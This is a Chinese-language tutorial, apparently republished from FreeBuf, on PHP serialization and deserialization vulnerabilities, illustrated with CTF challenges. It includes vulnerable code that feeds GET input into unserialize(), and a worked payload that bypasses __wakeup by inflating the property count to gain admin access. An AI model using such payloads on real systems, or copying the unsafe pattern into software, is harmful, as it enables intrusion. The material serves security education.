32

PHP反序列化漏洞入门

 4 years ago
source link: https://www.freebuf.com/articles/web/221213.html
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

序列化和反序列化的概念

序列化就是将一个对象转换成字符串。字符串包括 属性名 属性值 属性类型和该对象对应的类名。

反序列化则相反将字符串重新恢复成对象

对象的序列化利于对象的保存和传输,也可以让多个文件共享对象。

ctf很多题型也都是考察PHP反序列化的相关知识

PHP的序列化

序列化函数serialize()

首先我创一个Ctf类 里面写了三个属性 后创建了一个ctfer对象 将Ctf类里的信息进行了改变。如果后面还要用到这个对象,就可以先将这个对象进行实例化。用的时候在反序列化出来就ok了

uQvi6nb.jpg!web

O:3:"Ctf":3{s:4:"flag";s:13:"flag{abedyui}";s:4:"name";s:7:"Sch0lar";s:3:"age";s:2:"18";}
O代表对象 因为我们序列化的是一个对象 序列化数组则用A来表示
3 代表类名字占三个字符 
ctf 类名
3 代表三个属性
s代表字符串
4代表属性名长度
flag属性名
s:13:"flag{abedyui}" 字符串 属性值长度 属性值

serialize() 函数会检查类中是否存在一个魔术方法 __sleep()。如果存在,__sleep()方法会先被调用,然后才执行序列化操作。

可以再__sleep()方法里可以决定哪些属性被序列化

如果没有__sleep()方法则默认序列化所有属性

EZjEraQ.jpg!web

上图__sleep()方法使flag age 属性序列化 name并没有被序列化

访问控制修饰符

根据访问控制修饰符的不同 序列化后的 属性长度和属性值会有所不同,所以这里简单提一下

public(公有)
protected(受保护)
private(私有的)

protected属性被序列化的时候属性值会变成%00*%00属性名

private属性被序列化的时候属性值会变成%00类名%00属性名

可能有点难理解 这里我敲一下大家就懂了

eqEbAfb.jpg!web

O:3:"Ctf":3:{s:4:"name";s:7:"Sch0lar";s:6:"*age";s:2:"19";s:9:"Ctfflag";s:8:"get flag";}

可以看到

s:6:"*age" //*前后出现了两个%00也就是空白符 一个%00长度为一 所以序列化后 该属性长度为6
s:9:"Ctfflag" //ctf前后也就是类名前后出现两个%00 所以长度为9

PHP的反序列化

反序列化函数unserialize()

反序列化就是将一个序列化的字符串,还原回去

JNZbaaB.jpg!web

与 序列化函数类似 unserialize() 会检查是否存在一个 __wakeup()魔术方法

如果存在则会先调用__wakeup()方法在进行反序列化

可以再__wakeup()方法中对属性进行初始化或者改变。

BrMzE3F.jpg!web

反序列化之前重新给flag属性赋值

当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。这个大家应该都知道很常见的姿势了。为了直观一点找了些考察反序列化的ctf。

ctf

jiQJ3e2.jpg!web

首先我们本地进行序列化后得到字符串

O:4:"xctf":1:{s:4:"flag";s:3:"111";}

MbiMJzn.jpg!web

把1写成2 达到绕过wakeup()效果 拿到flag

NfAbmqQ.jpg!web

找到一个 比较能总结这篇文章的题

yIz6Jbm.jpg!web

看到良好的备份网站习惯

url上直接/ www.zip 下载了网站源码

index.php里发现核心代码

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
?>

读了class.php 发现需要 username=admin 并且 password=100才可以 还有一段核心代码

function __wakeup(){
        $this->username = 'guest';
}

Q7NnIvA.jpg!web

我们本地进行实例化 序列化

$a = new Name('admin',100);
$b = serialize($a);
print_r($b);

得到序列化后的字符串为

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

代码中存在 __wakeup前面说过。

当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。

还有因为我们要通过get方式进行提交 所以%00也必须写在url上

最终payload为

?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

jMbeYvI.jpg!web


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK